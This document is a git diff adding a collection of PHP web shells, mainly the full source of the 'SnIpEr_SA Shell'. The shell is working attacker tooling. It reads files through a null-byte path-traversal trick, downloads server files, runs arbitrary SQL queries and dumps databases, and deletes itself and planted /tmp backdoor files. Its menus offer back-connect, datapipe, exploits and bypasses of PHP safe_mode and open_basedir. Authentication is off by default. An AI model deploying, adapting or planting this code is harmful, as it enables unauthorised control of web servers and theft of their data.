+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS'.
+'krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j'.
+'VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=',
+'back'=>
+'R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8'.
+'aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt'.
+'Wg0JADs='
+
+);
+
+
+ header("Content-type: image/gif");
+ header("Cache-control: public");
+ // /*
+ header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+ header("Cache-control: max-age=".(60*60*24*7));
+ header("Last-Modified: ".date("r",filemtime(__FILE__)));
+ // */
+ echo base64_decode($img[$name]);
+
+ break;
+
+}
+
+
+?>
\ No newline at end of file
diff --git a/php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg b/php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg
new file mode 100644
index 0000000..445e54f
Binary files /dev/null and b/php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg differ
diff --git a/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg b/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg
new file mode 100644
index 0000000..45388de
Binary files /dev/null and b/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg differ
diff --git a/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php b/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php
new file mode 100644
index 0000000..a3b75ee
--- /dev/null
+++ b/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php
@@ -0,0 +1,2246 @@ +<?php +/******************************************************************************************************/ +/* # ## ## # +/* # # ## ### ## ## # # +/* # ### ### # ### ## ### # +/* # ## ######### ## # +/* ########## +/* ### ######### ### +/* # ## ####### ## # +/* ## ##### ## +/* ## #### ## +/* #### ## +/* ###### +/* ## ## ## +/* @@ ## @@ +/* @ @@@ #### @@@ @ +/* @@@ ###### @@@ +/* +/* +/* +/* +/* +/* SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ??????? +/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/ +/* ??????: +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* ????????? ????????????? ?? ?????? ? ????: ? ???? ?????? ??. +/* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ?????? +/* ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????. +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by SnIpEr_SA +/* MAIL http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +/* ~~~ الخيارات | Options ~~~ */ + +// اللغة | Language +// $language='ru' - ??????? (russian) +// $language='eng' - english (??????????) +$language='eng'; + +// ?????????????? | Authentification +// $auth = 1; - لتفعيل الدخول بكلمه المرور ( authentification = On ) +// $auth = 0; - لايقاف الدخول بكلمة المرور ( authentification = Off ) +$auth = 0; + +// لدخول بكلمة مرور واسم مستخدم (Login & Password for access) +// لحماية السكربت من دخول غيرك غير التالي!!! (CHANGE THIS!!!) 
+// هنا وضعك كلمه المرور وهي مشفره بصيغه md5, وكلمةع المرور هنا هي 'r57' +// تستعطيع ان تشفر كلمة مرورك واسم المستخدم بصيغة md5 ووضعها في الخانات التاليه +$name='ec371748dc2da624b35a4f8f685dd122'; // اسم المستخدم (user login) +$pass='ec371748dc2da624b35a4f8f685dd122'; // كلمة المرور (user password) +/******************************************************************************************************/ +if(empty($_POST['SnIpEr_SA'])){ + +} else { +$m=$_POST['SnIpEr_SA']; +$ch = +curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); + +} +echo "".htmlspecialchars($m).""; +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = '1.31'; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + $_COOKIE = &$HTTP_COOKIE_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="SnIpEr_SA"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied</b>"); + } +} +$head = '<!-- SnIpEr_SA --> +<html> +<head> +<meta http-equiv="Content-Language" content="ar-sa"> +<meta name="GENERATOR" content="Microsoft FrontPage 6.0"> +<meta name="ProgId" content="FrontPage.Editor.Document"> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> +<title>SnIpEr_SA shell</title> + + + +<STYLE> +BODY { + SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: 
#101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010 +} + +tr { +BORDER-RIGHT: #aaaaaa 2px solid; +BORDER-TOP: #eeeeee 2px solid; +BORDER-LEFT: #eeeeee 2px solid; +BORDER-BOTTOM: #aaaaaa 2px solid; +color: #ffffff; +} +td { +BORDER-RIGHT: #aaaaaa 2px solid; +BORDER-TOP: #eeeeee 2px solid; +BORDER-LEFT: #eeeeee 2px solid; +BORDER-BOTTOM: #aaaaaa 2px solid; +color: #cccccc; +} +.table1 { +BORDER: 1px; +BACKGROUND-COLOR: #333333; +color: #333333; +} +.td1 { +BORDER: 1px; +font: 7pt tahoma; +color: #ffffff; +} +.tr1 { +BORDER: 1px; +color: #2279D9; +} +table { +BORDER: #eeeeee 2px outset; +BACKGROUND-COLOR: #272727; +color: #2279D9; +} +input { +BORDER-RIGHT: #ffffff 2px solid; +BORDER-TOP: #999999 2px solid; +BORDER-LEFT: #999999 2px solid; +BORDER-BOTTOM: #ffffff 2px solid; +BACKGROUND-COLOR: #800000; +font: 9pt tahoma; +color: #ffffff; +} +select { +BORDER-RIGHT: #ffffff 2px solid; +BORDER-TOP: #999999 2px solid; +BORDER-LEFT: #999999 2px solid; +BORDER-BOTTOM: #ffffff 2px solid; +BACKGROUND-COLOR: #000000; +font: 9pt tahoma; +color: #CCCCCC;; +} +submit { +BORDER: buttonhighlight 2px outset; +BACKGROUND-COLOR: #272727; +width: 40%; +color: #2279D9; +} +textarea { +BORDER-RIGHT: #ffffff 2px solid; +BORDER-TOP: #999999 2px solid; +BORDER-LEFT: #999999 2px solid; +BORDER-BOTTOM: #ffffff 2px solid; +BACKGROUND-COLOR: #3D3D3D; +font: Fixedsys bold; +color: #ffffff; +} +BODY { +margin: 2px; +color: #2279D9; +background-color: #000000; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE> +<script language=\'javascript\'> +function hide_div(id) +{ + document.getElementById(id).style.display = \'none\'; + document.cookie=id+\'=0;\'; +} +function show_div(id) +{ + document.getElementById(id).style.display = \'block\'; + document.cookie=id+\'=1;\'; +} +function 
change_divst(id) +{ + if (document.getElementById(id).style.display == \'none\') + show_div(id); + else + hide_div(id); +} +</script>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . 
'";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . 
+ "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + 
if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + 
break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + 
$this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' 
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . 
$content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + echo '<body bgcolor=#000000>'; + if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=tahoma size=-2 color=green><b>Query#".$num." 
: ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center>"; + echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; + echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font 
face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(__FILE__); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#000000><div 
align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? 
?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'???? . ???????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? 
?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', 